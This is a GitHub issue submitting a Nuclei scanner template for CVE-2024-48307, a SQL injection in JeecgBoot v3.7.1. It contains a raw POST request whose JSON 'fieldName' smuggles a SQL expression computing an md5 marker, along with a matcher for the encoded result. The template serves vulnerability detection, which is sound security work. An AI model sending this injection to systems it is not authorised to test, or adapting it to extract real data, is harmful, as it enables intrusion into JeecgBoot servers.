### ISSUE TITLE
CVE-2024-48307

### ISSUE THREAD

**Issue by charis3306** [projectdiscovery/nuclei-templates#11297]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: CVE-2024-48307

info:
  name: JeecgBoot-onlDragDatasetHeadgetTotalDataSQLi
  author: lbb
  severity: high
  description: JeecgBoot v3.7.1 was discovered to contain a SQL injection vulnerability via the component /onlDragDatasetHead/getTotalData.

http:
- raw:
  - |-
    POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
    Host: {{Hostname}}
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
    Connection: close
    Content-Type: application/json

    {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(0x7e,(select md5('by_apt39')),0x7e)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

  max-redirects: 3
  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - 'fjFjODhlZTg2YjFkMjdhNmEyNjE4NzU0NTVmZDEwNTgxfg=='
    condition: and

  - type: status
    status:
      - 200
    condition: and
```

### Relevant dumped responses

```shell

```

### Anything else?

![Image](https://github.com/user-attachments/assets/97a8696a-168b-4afe-8b7e-24bea5f6505b)
